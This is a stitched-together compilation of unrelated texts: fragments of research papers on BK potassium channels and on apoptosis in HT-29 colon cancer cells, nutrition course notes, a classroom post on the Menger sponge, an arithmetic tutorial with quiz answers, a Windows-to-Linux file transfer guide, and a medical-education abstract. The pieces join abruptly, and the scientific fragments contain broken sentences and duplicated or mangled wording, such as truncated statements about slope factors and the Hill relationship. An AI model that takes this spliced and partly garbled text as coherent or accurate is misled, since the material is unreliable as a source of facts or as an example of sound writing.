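The comparative Ct quantification described above is a simple arithmetic transform; as a sketch, the 2^(−ΔΔCt) fold change can be computed as follows (the Ct values below are illustrative, not the study's data):

```python
def relative_expression(ct_target_treated, ct_ref_treated,
                        ct_target_control, ct_ref_control):
    """Comparative Ct method: fold change of a target gene (e.g. AEG-1)
    relative to a reference gene (e.g. GAPDH), as 2^(-ddCt)."""
    d_ct_treated = ct_target_treated - ct_ref_treated
    d_ct_control = ct_target_control - ct_ref_control
    dd_ct = d_ct_treated - d_ct_control
    return 2.0 ** (-dd_ct)

# Illustrative Ct values: shRNA raises the target Ct by 2 cycles,
# i.e. ~4-fold less transcript than the control.
print(relative_expression(25.0, 18.0, 23.0, 18.0))  # 0.25
```

Because Ct is a log2 quantity, each extra cycle relative to the control halves the inferred expression, which is why knockdown shows up as a fold change below 1.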
The symbol > was assigned in the case of a drug showing a larger absolute value that was not statistically significant, while the symbol > was assigned when the calculated values were statistically significant with respect to those calculated for the other drugs. The % change of cell viability induced by the external K+ challenge (hyper-K or hypo-K) was calculated with respect to the normokalemia condition; in the presence of BK channel blockers, it was calculated with respect to the control condition (absence of blockers) using the following equations: % change of cell viability = (Hyper-K or Hypo-K / Normo-K) × 100; % change of cell viability = ((Normo-K + Blockers) / Normo-K) × 100. The effects of the BK channel openers on cell viability were evaluated against the changes of this parameter induced by IbTX under normokalemia (Normo-K + IbTX), hyperkalemia (Hyper-K), or hypokalemia (Hypo-K) conditions using the following equations: % change of cell viability = ((Normo-K + IbTX) + Openers) / (Normo-K + IbTX) × 100; % change of cell viability = ((Hyper-K or Hypo-K) + Openers) / (Hyper-K or Hypo-K) × 100. cell viability in hslo-HEK293. BK openers prevented the enhancement of cell viability induced by hyperkalemia or IbTX in hslo-HEK293, showing an efficacy comparable with that observed as BK openers. BK channel modulators failed to affect cell currents and viability under hyperkalemia conditions in the absence of the hslo subunit. In contrast, under hypokalemia cell viability was reduced by −22 ± 4% and −23 ± 6% in hslo-HEK293 and HEK293 cells, respectively; the BK channel modulators failed to affect this parameter in these cells. In conclusion, the BK channel regulates cell viability under hyperkalemia but not hypokalemia conditions. BFT and ACTZ were the most potent drugs both in activating the BK current and in preventing the cell proliferation induced by hyperkalemia.
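The viability ratios defined above translate directly into code; a minimal sketch under the same definitions (the readings and variable names are illustrative, not measured values):

```python
def pct_change(viability_condition, viability_reference):
    """% change of cell viability: (condition / reference) * 100,
    mirroring the ratios defined in the Methods."""
    return viability_condition / viability_reference * 100.0

# Illustrative absorbance-style readings (arbitrary units)
normo_k, hyper_k = 1.00, 1.30          # normokalemia vs hyperkalemia
normo_ibtx, ibtx_opener = 1.25, 1.05   # Normo-K + IbTX, then + opener

print(pct_change(hyper_k, normo_k))         # hyper-K vs normo-K
print(pct_change(ibtx_opener, normo_ibtx))  # opener vs (Normo-K + IbTX)
```

Values above 100% correspond to the viability enhancement seen under hyperkalemia or IbTX, and values below 100% to the suppression of that enhancement by the openers.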
These findings may have relevance in disorders associated with abnormal K+ ion homeostasis, including periodic paralysis and myotonia. Introduction. Potassium ions regulate inflammation, oxidative stress, vascular biology, blood pressure, and the excitability of cells, exerting beneficial effects on different tissues [1–3]. Abnormalities in serum potassium levels are associated with acquired and congenital diseases affecting several organ systems, including skeletal muscle. Severe hyperkalemia characterizes hyperkalemic renal tubular acidosis (type IV) and mineralocorticoid deficiency (hypoaldosteronism states), as well as tumor lysis syndrome, rhabdomyolysis, marked leucocytosis and thrombocytosis, trauma, and burns. Disease progression and increased cardiac mortality are observed in chronic kidney disease under hypokalemia or hyperkalemia conditions, and these effects are gender- and race-dependent. Severe nephropathy with renal interstitial fibrosis and ventricular hypertrophy is seen in human patients under hyperkalemic states [7,8]. Marked variations in serum potassium concentration characterize the primary periodic paralyses (PP), which are rare autosomal-dominant disorders affecting the neuromuscular apparatus, characterized by episodes of muscle weakness and paralysis. The primary PPs are hyperkalemic periodic paralysis, hypokalemic periodic paralysis, and Andersen's syndrome. Other related disorders include thyrotoxic periodic paralysis associated with thyrotoxicosis. Familial periodic paralysis and thyrotoxic periodic paralysis are linked to mutations in skeletal muscle sodium, calcium, or potassium channel genes associated with muscle fiber depolarization and inexcitability [9–12].
Besides the short-term arrhythmogenic effects of hypo- and hyperkalemia, abnormalities of potassium ion homeostasis have a clear negative impact on clinical outcomes in neuromuscular disorders, but the pathomechanisms associated with hyperkalemia or hypokalemia conditions are not well understood. Vacuolar myopathy and t-tubule aggregates characterize muscle biopsies of hypoPP patients and K-depleted rats, a non-genetic animal model of the disease [9,14]. Progressive muscular atrophy and permanent weakness were found in hypoPP patients carrying CACNA1S gene mutations. In Andersen's Syndrome, loss-of-function mutations of the KCNJ2 gene encoding Kir2.1 are associated with arrhythmias, muscle weakness, and skeletal muscle dysmorphisms, as demonstrated in the Kir2.1 knockout mouse, which exhibits a narrow maxilla and complete cleft of the secondary palate that may mimic the facial dysmorphology observed in humans [9,16]. In this case, the loss-of-function mutation of the Kir2.1 channel is associated with abnormal cell proliferation that reduces cell viability, explaining the dysmorphology characterizing the phenotype [16,17]. The Kir2.1 channel is indeed active in differentiating cells, inducing hyperpolarisation and setting the −60 mV (Vm) and are slope factors from the concentration–response relationships. The capability of the drugs to maximally activate the hslo channel was enhanced by patch depolarization (Figure 4A). The overall efficacy ranking of the openers, based on the analysis of variance at +30 mV (Vm), was BFT > NS1619 > ACTZ > DCP > ETX > RESV > QUERC > MTZ, which differed from that observed at −60 mV (Vm). The potency ranking of the openers, expressed as EC50 at the same membrane voltage, was BFT > ACTZ > DCP > ETX > RESV > NS1619 > QUERC > MTZ, which was similar to that observed at −60 mV (Vm) (Table 1).
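The concentration–response relationships and slope factors summarized above are conventionally described by a Hill function; a minimal sketch, with an assumed EC50 and slope rather than the paper's fitted values:

```python
def hill_response(conc, ec50, slope, bottom=0.0, top=100.0):
    """Percent activation of the BK current at a given opener
    concentration, using a standard Hill (logistic) function."""
    return bottom + (top - bottom) / (1.0 + (ec50 / conc) ** slope)

# Assumed parameters: EC50 = 10 uM, Hill slope = 1 (illustrative only)
print(hill_response(10.0, 10.0, 1.0))   # 50.0 -> half-maximal at the EC50
print(round(hill_response(100.0, 10.0, 1.0), 1))  # approaching saturation
```

Fitting this function to current amplitudes at each test potential yields the EC50 (potency) and maximal activation (efficacy) values used to construct the rankings quoted in the text.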
HCT was not effective as an opener of the hslo channel currents over the range of concentrations examined, at negative or positive membrane potentials. The Hill.
Cell line HT-29, a human colonic cancer cell line, was supplied by the Cancer Institute of the Chinese Academy of Medical Sciences. Oxidative stress was inhibited, and the expression of GRP78 and CHOP was significantly reduced, indicating that oxidative stress can affect the ERS pathway. Furthermore, it suggested that the occurrence of apoptosis was associated with the Bcl-2 gene family. In conclusion, this study demonstrated that M5-EPSs can induce apoptosis in HT-29 cells by disrupting the redox system through activation of the ERS signaling pathway. subsp. paracasei M5L (M5-EPSs) induced apoptosis in HT-29 colon cancer cells in association with regulation of the Bcl-2 gene family; treatments with M5-EPSs led to upregulation of ROS levels and downregulation of antioxidant enzyme activities, resulting in an imbalance in the oxidation system in HT-29 cells; endogenous ER stress (ERS) was involved in HT-29 cell apoptosis; and M5-EPSs induced HT-29 cell apoptosis by disrupting the redox system through activation of the ERS signaling pathway.

1. Introduction

Colorectal cancer, the third most common malignant tumor worldwide, is thought to be influenced by many factors, making this type of cancer a significant health concern (Bray et al., 2018). Although conventional and complementary therapies, including chemotherapy, radiation, surgery, physical treatment and immunotherapy, have been attempted to treat colorectal cancer, an effective treatment has not yet been found, and surgical resection is often used for colorectal cancer treatment (Adam et al.; Delaunoit et al., 2005; Zampino et al., 2016). However, the drug resistance of tumor cells blocks their apoptosis; furthermore, anticancer agents may have cytotoxic effects on normal cells (Alfarouk et al., 2015; Lichan Chen, 2018; Sun et al., 2012).
In recent years, an increasing number of natural products with anticancer compounds have had their pharmacological bioactivities confirmed and have been used to explain the mechanisms of cancer prevention through apoptosis. The endoplasmic reticulum activates the unfolded protein response (UPR) when it undergoes stress. This response can protect cells from the damage caused by endoplasmic reticulum stress (ERS) and restore cell function; however, when ERS is too strong or lasts too long, endoplasmic reticulum homeostasis becomes seriously unbalanced and cannot be repaired, which leads to cell apoptosis. The UPR normally activates three transcription factors, inositol-requiring enzyme 1 (IRE1), PEK-like endoplasmic reticulum kinase (PERK/PEK), and activating transcription factor 6 (ATF6), which degrade deposited unfolded and misfolded proteins. Of these three transcription factors, ATF6, as a receptor protein in the endoplasmic reticulum, is one of the factors in the apoptosis and autophagy pathways induced by ERS (Haque et al., 2015). ERS-induced death signaling pathways include the CHOP/GADD153, JNK, and caspase pathways (Wang et al., 2014). Cells enhance ATF4 through the PERK pathway; CHOP is also a transcription factor of the PERK pathway and the direct target of ATF4. CHOP and caspase expression are weak when homeostasis is balanced. When ERS occurs, CHOP and caspase expression increase significantly. Overexpression of CHOP and caspase can promote cell cycle arrest or lead to apoptosis (Liu et al., 2015). Another pathway that causes cell apoptosis is the oxidative stress pathway (Xiang et al., 2015). Various disorders and diseases, including cancer, inflammation, diabetes, Parkinson's disease, Alzheimer's disease, atherosclerosis, and aging, have been considered to be related to the massive production of reactive oxygen species (ROS) and oxygen-derived free radicals.
Besides, dysfunction of cells, cell cycle arrest, and apoptosis.
Micronutrients and Calories¶
Minerals and Trace Elements¶
Within the category of micronutrients we can classify things further into:
- Minerals - are elemental nutritional components that we require in quantities of \(>100\:mg/day\)
- These are either structural elements or large components of biochemical processing
- e.g. Na, K, Ca, Mg, Cl, P, S
- Trace elements - elemental nutritional components that we require in quantities \(<100\:mg/day\)
- These are typically required for hormonal and metabolic function and are quite often, involved in enzymatic processes
- e.g. Fe, I, F, Zn, Se, Cu, Mn, Cr, Mo, Co, Ni
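The >100 mg/day cut-off above can be expressed as a tiny helper function. This is only an illustrative sketch: the threshold comes from the definitions above, while the example requirement values (roughly 1000 mg/day for calcium, about 15 mg/day for iron) are typical figures, not values taken from these notes.

```python
# Daily requirement threshold (mg/day) separating minerals from
# trace elements, as defined in the notes above.
MINERAL_THRESHOLD_MG = 100

def classify_micronutrient(requirement_mg_per_day):
    """Classify an elemental micronutrient by its daily requirement."""
    if requirement_mg_per_day > MINERAL_THRESHOLD_MG:
        return "mineral"
    return "trace element"

# Calcium (~1000 mg/day) is a mineral; iron (~15 mg/day) is a trace element.
print(classify_micronutrient(1000))  # mineral
print(classify_micronutrient(15))    # trace element
```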
Their deficiency leads to very specific symptoms:
|Trace Element||Deficiency Symptom|
|Fe||Unusual tiredness, paleness, brittle nails|
|I||Swollen neck, unexpected weight gain, weakness, hair loss, heavy or irregular periods|
|Zn||Wounds that won’t heal, open sores on the skin, lack of alertness|
|Se||Muscle weakness, mental fog, weakened immune system|
|Cu||Weakness, difficulties walking, vision loss|
|Mn||Skeletal defects, slow or impaired growth, abnormal metabolism of carbohydrate and fat|
|Cr||Inhibition of protein synthesis, impaired insulin function, elevated cholesterol levels, anxiety and fatigue|
|Mo||Developmental delays, visual alterations and neurological changes|
|Co||Numbness, fatigue and tingling sensations in hand and feet|
|Ni||Changes in skin colour, hair becomes coarser|
Detection and Quantification - Minerals and Trace Elements¶
There are two primary sample-preparation methods used for the determination/quantification of elemental micronutrients. Both typically rely on ICP-OES (inductively coupled plasma optical emission spectroscopy), a type of atomic emission spectroscopy (AES), with the sample first broken down either by ashing or by wet digestion.
Dry Ashing¶

This is the process of heating the sample to high temperatures (\(500-600^\circ C\)) to drive off moisture and oxidise the elements for quantification. A benefit is that there is no need for the use of blanks, however more volatile elements such as Hg and Ni may be lost. There may also be chemical interaction between the oxides formed and the crucible that’s used for the ashing.
Wet Digestion¶

Rather than using heat to oxidise the samples, they are chemically oxidised using acids, peroxides, etc. Since there is no volatilisation, there is no loss through this method, however it requires more attention and is harder to automate.
It is possible to accelerate both methods with the addition of microwave reactors.
|Name||Structure||Food Source||Function||RDI (daily)|
|Vitamin A (retinol)||(structure not shown)||Liver, butter, egg yolk, carrots, spinach, sweet potatoes||Vision, healing eye and skin injuries||\(800-1500\:\mu g\)|
|Vitamin D (calciferol)||(structure not shown)||Salmon, sardines, cod liver oil, cheese, milk, eggs||Promotes calcium and phosphate absorption and mobilisation||\(5-10\:\mu g\) (and sunlight)|
|Vitamin E (tocopherol)||(structure not shown)||Vegetable oils, nuts, potato chips, spinach||Antioxidant||\(8-10\:mg\)|
|Vitamin K||(structure not shown)||Spinach, potatoes, cauliflower, beef liver||Blood clotting||\(65-80\:\mu g\)|
|Name||Structure||Food Source||Function||RDI (daily)|
|Thiamine (B1)||(structure not shown)||Beans, soybeans, cereals, ham, liver||Coenzyme (oxidative decarboxylation)||\(1.1\:mg\)|
|Riboflavin (B2)||(structure not shown)||Kidney, liver, yeast, almonds, mushrooms, beans||Coenzyme of oxidative processes||\(1.4\:mg\)|
|Niacin (B3)||(structure not shown)||Chickpeas, lentils, prunes, peaches, avocados, figs, fish, meat, mushrooms, peanuts, bread, rice, beans, berries||Coenzyme of oxidative processes||\(15-18\:mg\)|
|Pantothenic acid (B5)||(structure not shown)||Peanuts, buckwheat, soybeans, broccoli, lima beans, liver, kidney, brain, heart||Part of CoA; fat and carbohydrate metabolism||\(4-7\:mg\)|
|Pyridoxine (B6)||(structure not shown)||Meat, fish, nuts, oats, wheat germ, potato chips||Coenzyme in transamination; heme synthesis||\(1.6-2.2\:mg\)|
|Folate (B9)||(structure not shown)||Liver, kidney, eggs, spinach, beets, orange juice, avocados, rockmelon||Coenzyme in methylation and DNA synthesis||\(400\:\mu g\)|
|Cobalamin (B12)||(structure not shown)||Oysters, salmon, liver, kidney||Part of methyl removing enzyme in folate metabolism||\(1-3\:\mu g\)|
|Biotin (B7)||(structure not shown)||Yeast, liver, kidney, nuts, egg yolk||Synthesis of fatty acids||\(30-100\:\mu g\)|
|Vitamin C (ascorbic acid)||(structure not shown)||Citrus fruit, berries, broccoli, cabbage, capsicum, tomato||Hydroxylation of collagen; wound healing; bond formation; antioxidant||\(60\:mg\)|
Detection and Quantification - Vitamins¶
Due to the variety and size of vitamins, the simplest and most effective way to identify them is to use HPLC.
Reversed-phase HPLC can be used for fat-soluble vitamins and normal-phase HPLC for water-soluble ones. A strong solvent gradient can be used to separate out a combination of both, such as from a multivitamin.
Calories¶

The calorific content of food can be measured using a calorimeter, though the amount of energy released from burning will not be indicative of how much is available through digestion, so tables tend to be used instead. These are rough values, and the specific calorific content will depend on the food product.
Metabolisable Energy (ME)¶
Is the amount of “food energy available for heat production and body gains”. These are based on the Atwater Factors, though they may not be truly indicative of all foods. This metric aims to consider only the nutritional value that can be actively utilised by the body to produce ATP.
The Atwater General Factor System¶
Is based on the heats of combustion of the macronutrients and corrects for losses in digestion, absorption and urinary excretion of urea.
The Extensive General Factor System¶
Is based on the Atwater system, however it makes a few modifications and refinements, such as accounting for dietary fibre separately from bulk carbohydrates.
The Atwater Specific Factor System¶
Takes the system one step further by considering the food that these bulk nutrients come from
|Food Product||Protein Factor (\(kcal/g\))||Fat Factor (\(kcal/g\))||Carbohydrate Factor (\(kcal/g\))|
|Meat, fish, poultry||4.27||9.02|
|Legumes and nuts||3.47||8.37||4.07|
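As a quick illustration of the specific-factor idea, the factors from the table above can be applied to a food's macronutrient masses to estimate metabolisable energy. This is only a sketch: the factors for legumes and nuts come from the table, but the gram values in the example are made up.

```python
# Atwater specific factors (kcal/g) for legumes and nuts, from the table above.
FACTORS = {"protein": 3.47, "fat": 8.37, "carbohydrate": 4.07}

def metabolisable_energy_kcal(grams):
    """Estimate ME by multiplying each macronutrient mass by its factor."""
    return sum(FACTORS[nutrient] * g for nutrient, g in grams.items())

# Hypothetical 100 g serving of mixed nuts: 20 g protein, 50 g fat, 20 g carbs.
energy = metabolisable_energy_kcal({"protein": 20, "fat": 50, "carbohydrate": 20})
print(round(energy, 1))  # 569.3
```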
Today in class, we learned about fractals. To help students understand the concept better, we made our own Menger sponge (see photos below). I had each student make a single cube. Then we combined 20 of them to create the 1st iteration. To make the 2nd iteration, we would need 400 of the cubes, so we were not able to go further. Students learned that the surface area of the sponge approaches \(\infty\) and the volume approaches zero. This led to a discussion of the concept of limit (often first introduced in a precalculus or calculus course).
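For readers who want to check these limits numerically, here is a short Python sketch. It uses the standard facts that a level-n sponge consists of \(20^n\) cubes of side \((1/3)^n\) (so its volume is \((20/27)^n\)), together with the known closed form \(A(n) = 2(20/9)^n + 4(8/9)^n\) for the surface area, which is not derived in this post.

```python
def menger_volume(n):
    """Volume of a level-n Menger sponge built from a unit cube."""
    return (20 / 27) ** n

def menger_surface_area(n):
    """Surface area of a level-n Menger sponge (standard closed form)."""
    return 2 * (20 / 9) ** n + 4 * (8 / 9) ** n

# Level 0 is the unit cube: area 6, volume 1.
print(menger_surface_area(0), menger_volume(0))  # 6.0 1.0

# As n grows, the area blows up while the volume shrinks toward zero.
for n in (1, 5, 10):
    print(n, menger_surface_area(n), menger_volume(n))
```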
Hey guys! Today, we are going to take a look at the mathematical operations: addition, subtraction, multiplication, and division. These four operations serve as the fundamental building blocks for all math, so it is crucial to have a solid understanding to build upon. Let’s dive in.
Addition and Subtraction
We use addition and subtraction to solve many real-world situations. Addition and subtraction are simply the mathematical terms used to describe “combining” and “taking away.” When we add, we are combining, or increasing. When we subtract, we are taking away, or decreasing.
As a reminder:
- The symbol we use for addition is \(+\)
- The answer to an addition problem is called the sum
- The symbol we use for subtraction is \(–\)
- The answer to a subtraction problem is called the difference
Essentially, addition and subtraction are opposite operations. One adds value, and the other deducts value. One strategy for visualizing these two operations is to use a number line. We will use a number line to illustrate the following examples.
Let’s imagine a situation that involves the sale of popcorn. For this scenario, let’s assume that you are trying to raise money by selling bags of popcorn, and you start with 20 bags.
When your first customer arrives, they wish to purchase 4 bags of popcorn. This means that your remaining number of bags will decrease. We can represent this situation with a simple equation that involves subtraction. We started with 20 bags, and we “decreased by 4,” or subtracted 4. Our subtraction equation is written as \(20-4=16\).
On a number line, we can represent this deduction by starting at 20 and then moving backward four units in the negative direction. Each jump backward represents subtraction by 1.
Now, let’s say you started with 20 bags of popcorn and ended up with 6 bags left at the end of the day. You need to replenish your stock in order to keep up your sales, so you make 4 more bags of popcorn. How many bags of popcorn do you now have available to sell? For this scenario, since we are looking at an increase of bags, we will use addition.
This situation can be described using the equation \(6+4=10\). You had 6 bags initially, and then “combined” that amount with 4 more bags. Now you have 10 bags in all. On a number line, addition is represented by jumps to the right, in the positive direction. Each jump to the right represents the addition of one unit. So in this example we would be starting at 6, and jumping 4 units to the right. We can see that we land on 10.
It is important to notice that when using addition, the order of the values does not matter. For example, \(10+30\) is the same as \(30+10\). The placement, or arrangement of the values has no effect on the outcome. Both arrangements would equal 40. However, the same is not true for subtraction. Does \(30-10\) mean the same thing as \(10-30\)? Clearly not. We can see that the order matters when dealing with a situation involving subtraction. The technical term for this quality is known as the commutative property. Essentially, this property is true for operations where the values can move around, “commute”, and the outcome of the expression or equation will not change. The commutative property applies to addition, but not to subtraction.
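For readers who know a little programming, the commutative property is easy to verify directly. Here is a quick Python sketch using the same numbers as above:

```python
a, b = 10, 30

# Addition is commutative: the order of the values doesn't change the sum.
print(a + b == b + a)  # True

# Subtraction is not: 30 - 10 = 20, but 10 - 30 = -20.
print(a - b == b - a)  # False
print(b - a, a - b)    # 20 -20
```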
Multiplication and Division
Another operation that also shares the commutative property is multiplication. Let’s discuss multiplication together with division, as we did for addition and subtraction. Multiplication and division are similar to addition and subtraction in that they perform opposite functions. The function of multiplication is to represent multiple groups of a certain value, whereas division is designed to show the separating or subdividing of a value into smaller groups.
As a reminder:
- The symbol we use for multiplication is \(\times\)
- The answer to a multiplication problem is called the product
- The symbol we use for division is \(\div\)
- The answer to a division problem is called the quotient
Multiplication is essentially a convenient and time-efficient way to show what’s called “repeated addition.” For example, if you need to fill 30 bags of popcorn, and each bag requires 60 kernels, it could take hours to count up how many kernels you need in total by just using addition. A faster and more efficient way to make this calculation would be to use repeated addition. Instead of counting each kernel independently, we would group them up, and add the groups together. The calculation would then become 30 groups of 60. This grouping, for the purpose of repeated addition, is the multiplication process at its core. 30 groups of 60 is written as \(30\times 60=1,800\). So 1,800 kernels are required to fill up 30 bags of popcorn.
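The “repeated addition” idea can also be checked directly in code: adding 60 thirty times gives the same result as a single multiplication. A quick Python sketch:

```python
kernels_per_bag = 60
bags = 30

# Repeated addition: add 60 to the total, thirty times.
total_by_addition = sum([kernels_per_bag] * bags)

# Multiplication: 30 groups of 60.
total_by_multiplication = bags * kernels_per_bag

print(total_by_addition, total_by_multiplication)  # 1800 1800
```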
Both addition and multiplication are commutative, because the order does not affect the answer. 30 groups of 60 gets us the same result as 60 groups of 30.
\((30\times 60)=(60\times 30)\)
Our last operation, division, can be considered multiplication’s opposite. When we use division, we are essentially splitting up a large group into smaller subgroups. For our popcorn example, we can use division to answer the following question:
How many bags of popcorn can I make using 1,800 kernels if each bag requires 60 kernels?
This situation requires us to divide the large value 1,800 into groups of 60. Each smaller subgroup will now represent a bag of popcorn. 1,800 divided into groups of 60 is represented as \(1,800\div 60\). In this case, the answer is 30, so 30 bags of popcorn can be made with our 1,800 kernels. As you can see, division is not commutative because the order of the values plays a crucial role in determining the answer. \(1,800\div 60\) is not the same thing as \(60\div 1,800\).
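Division undoes the multiplication from the previous example, and a quick Python check also shows that it is not commutative:

```python
kernels = 1800
kernels_per_bag = 60

# Split 1,800 kernels into groups of 60: each group is one bag.
bags = kernels // kernels_per_bag
print(bags)  # 30

# Division is not commutative: swapping the order changes the result.
print(60 / 1800 == 1800 / 60)  # False
```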
Okay, that’s all for this review of the mathematical operations! Thanks for watching, and happy studying!
The answer to a subtraction problem is called the …
A is the correct answer. Since subtraction is the difference between a smaller number and a larger number, the answer to a subtraction problem is called the difference.
Which statement is true?
Subtraction and multiplication are opposite operations.
Subtraction and division are opposite operations.
Multiplication and addition are opposite operations.
Multiplication and division are opposite operations.
D is the correct answer. Division splits a large group into smaller subgroups and multiplication is repeated addition of smaller subgroups to find the total in the large group. Therefore, these operations perform opposite functions.
Jamie rents a bicycle for $8 per hour. He has the bicycle for 4 hours altogether. Which equation can be used to find out how much money Jamie spends to rent the bicycle?
C is the correct answer. Since Jamie spends $8 for every hour he has the bicycle, he is spending $8 + $8 + $8 + $8, which is equal to $8 ✕ 4, or 32 dollars.
Which statement best illustrates the commutative property?
B is the correct answer. The commutative property states that the numbers in a math problem can be moved or swapped and the outcome of the equation will not change. The commutative property applies to addition and multiplication but does not work for division or subtraction.
At Mike’s Deli, the price for deli turkey is $4 per pound. Kate is buying turkey to make sandwiches for a luncheon. If Kate spends $80, which equation represents how many pounds of turkey she bought?
C is the correct answer. Kate knows that the total amount spent was $80. She also knows that each pound cost her $4. Kate needs to know how many equal groups $80 is split into if there is $4 in each group. To solve this problem, Kate needs to divide. Since 80 is the number that is being split up, it comes first in the division problem. B is incorrect because \(4÷80\) is not the same as \(80÷4\).
Most home users have a dual-boot system that can boot from Linux, such as Ubuntu, or startup with Windows. This scenario, by far, is the easiest method to transfer files from Windows to Linux. However, others (business or personal) have Linux on another computer or laptop and need to copy files to that Linux system, which is a little more complex.
Although copying files from one program to another is relatively straightforward, you still need to learn how to do it properly. Keep reading to learn how to transfer files from Windows to Linux.
Five Ways to Transfer Files from Windows to Linux
Moving your files from one operating system to another means choosing the best option based on your current situation. Here are five methods you can choose from.
- Use a Linux File Browser like Nautilus to copy files on PCs with both operating systems.
- Use the Linux virtual machine on a Windows PC to copy files.
- Use an external network communication service (SSH or Secure Shell) for two networked PCs.
- Use a File Transfer Protocol (FTP) for internet transfers to a remote PC.
- Use sync software for copying to a remote or locally networked Linux PC.
Find out the details for each method in the sections below.
Copy Data from a Windows PC to Linux Using Nautilus
The easiest, most straightforward method to copy data from Windows to Linux involves using a Linux file browser like Nautilus. You can’t use Windows Explorer or any other Windows file browser because the OS cannot read Linux partitions, but Linux can read Windows partitions.
Here’s how to use Nautilus in Ubuntu to copy/paste files from Windows partitions.
- Launch the “Nautilus” file browser.
- Browse the Windows partitions for the files you want to copy to Linux (Ubuntu in this example).
- Select the files, right-click, and choose “Copy.”
- Navigate to the desired location in Ubuntu.
- Right-click and choose “Paste.”
As you can see above, the process is simple for PCs with both operating systems.
Note: Permissions can affect what files are copyable from Windows. Since the OS is offline, you can change permissions temporarily using Linux, but do so at your own risk. However, most personal files are found in accessible folders and locations.
Copy Data From a Windows PC to Linux With a Linux Virtual Machine
Using a virtual machine to run Linux in Windows is a clever way to copy your files. It is more complex than using Nautilus in Linux yet easier than other configurations. This allows you to run the other system in an app window and use it as a different computer.
To combine your two systems into one PC, you will need the help of additional software. One of the most common ones is Oracle VM VirtualBox. This platform allows users to work with several operating systems within one device.
How to Set Up the VirtualBox Platform on Windows
- Install the VirtualBox Guest Additions platform.
- Choose “Headless Start” after clicking on “Start” (the green arrow icon).
- Find the “Shared Folders” in the “Settings.”
- Select the “Machine Folders” option.
- Add a shared folder by clicking the “+” symbol in the window’s top right corner.
- Choose the “Folder Path” from the directory and name.
- Ensure that the shared folder is available when you run the VM. To achieve this, check the “Auto-mount” box before confirming your choices.
- Click the “OK” button.
- Reboot your “Virtual Machine” system, and the setup will be ready for action.
You can copy your files between the host PC (Windows) and the virtual guest system (Linux) or vice versa.
Copy Data From a Windows PC to Linux Using SSH
Secure Shell (SSH) is a specific network protocol that offers users safe access to a different device. Therefore, your first step with this method is to enable SSH on your Linux PC. Once you do this, you can copy your files through the command line from Windows to Linux.
How to Set Up an SSH Server on Linux
- You will need to open a terminal and update your operating system.
- Install the SSH server via OpenSSH. OpenSSH encrypts the connection, protecting your data in transit.
- While waiting for the SSH server to finish installing, you can verify that the OpenSSH server is running properly with the command "sudo service ssh status".
- Install an SSH client such as PuTTY. This entirely free file transfer application is used between different networks, but it can’t function without the PuTTY Secure Copy Client (PSCP) tool.
- Download and save the pscp.exe file on your Windows C:\ drive.
- Copy your files from Windows to Linux with the following code (adjust to your needs):
c:\pscp c:\some\path\to\a\file.txt user@remote-host:/home/user
Note: You must input your Linux computer password before the file transfer begins.
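Because the pscp invocation is easy to get wrong, a small helper that assembles the command line can be handy. This is an illustrative Python sketch only: the function name and the example host are made up, and the argument order (local file, then user@host:remote-directory) follows the command shown above.

```python
def build_pscp_command(local_path, user, host, remote_dir):
    """Assemble a pscp command line: pscp <local> <user>@<host>:<remote>."""
    return f"c:\\pscp {local_path} {user}@{host}:{remote_dir}"

# Hypothetical example values; substitute your own file, user, and host.
cmd = build_pscp_command(r"c:\some\path\to\a\file.txt",
                         "user", "192.168.1.10", "/home/user")
print(cmd)
# c:\pscp c:\some\path\to\a\file.txt user@192.168.1.10:/home/user
```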
Copy Data From a Windows PC to Linux With FTP
File Transfer Protocol (FTP) is another excellent way to copy your data from Windows to Linux. Many may find this method more manageable since you do not need to type commands. Check your Linux server and ensure it is running. Also, you’ll need an app such as FileZilla to transfer with FTP.
- Run the “FileZilla” application in Windows.
- Open the “Site Manager.”
- Create a “New Site.”
- Change to the “SFTP” protocol.
- Input the target IP address into the “Host” section.
- Add your username and password for the host.
- Switch to “Normal” for the “Logon” type.
- Press “Connect.”
After following the above steps, you can use the FTP application to move your files from one server to another.
Copy Data From a Windows PC to Linux With Sync Software
Another option is using a file synching program to copy your files from Windows to Linux. Usually, these programs manage the connection between two devices or systems via an encrypted key. There are two great apps you can use for this method:
- Resilio Sync – Although this app offers a paid version, the free option will do the job.
- SyncThing – This app offers the same services as the previous one but is 100% free.
Whether you choose the first or the second option, the way they work is the same. After you install your desired app on Windows and choose a syncing folder, you can create the necessary key. As you set it up on Linux, your data will begin to sync between the two systems.
In closing, maintaining an open mind is essential to learning how to copy files from a Windows PC to Linux. If you’re unfamiliar with one of the two operating systems, learning how to manage file transfer between the two will take some time.
One of the best ways to transfer your files is to try all the methods above to rule out the ones that don’t work for you and find the ones you love. Eventually, you can streamline the process using the most suitable option.
- Research article
- Open Access
Does ultrasound education improve anatomy learning? Effects of the Parallel Ultrasound Hands-on (PUSH) undergraduate medicine course
BMC Medical Education volume 22, Article number: 207 (2022)
As ultrasound has become increasingly prominent in medicine, portable ultrasound is perceived as the visual stethoscope of the twenty-first century. Many studies have shown that exposing preclinical students to ultrasound training can increase their motivation and ultrasound competency. However, few studies have discussed the effect of ultrasound training on anatomy learning.
The Parallel Ultrasound Hands-on (PUSH) course was designed to investigate whether or not ultrasonography training affects anatomy knowledge acquisition. The PUSH course included anatomical structures located in the chest and abdomen (target anatomy) and was conducted in parallel to the compulsory gross anatomy course.
Learners (n = 140) voluntarily participated in this elective course (learners in the course before the midterm examination (Group 1, n = 69), or after the midterm examination (Group 2, n = 71)). Anatomy examination scores (written and laboratory tests) were utilized to compare the effects of the PUSH course.
Group 1 obtained significantly higher written test scores on the midterm examination (mean difference [MD] = 1.5 (7.6%), P = 0.014, Cohen’s d = 0.43). There was no significant difference in the final examination written test scores between the two groups (MD = 0.3 (1.6%), P = 0.472). In the laboratory test, neither the midterm (MD = 0.7 (2.8%), P = 0.308) nor the final examination (MD = 0.3 (1.5%), P = 0.592) showed a significant difference between the two groups. Students provided positive feedback on overall learning self-efficacy after the PUSH course (mean = 3.68, SD = 0.56 on a 5-point Likert scale). Learning self-efficacy in the cognitive domain was significantly higher than that in the affective domain (MD = 0.58; P < 0.001) and psychomotor domain (MD = 0.12; P = 0.011).
The PUSH course featured a hands-on learning design that empowered medical students to improve their anatomy learning.
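As a back-of-the-envelope check on the reported statistics above: Cohen's d is the mean difference divided by the pooled standard deviation, so the reported MD = 1.5 and d = 0.43 for the midterm written test imply a pooled SD of about 3.5 points. The sketch below computes this implied value; it is our inference, not a figure reported by the authors.

```python
# Cohen's d = mean_difference / pooled_sd  =>  pooled_sd = mean_difference / d
mean_difference = 1.5   # midterm written-test MD reported above (points)
cohens_d = 0.43         # reported effect size

implied_pooled_sd = mean_difference / cohens_d
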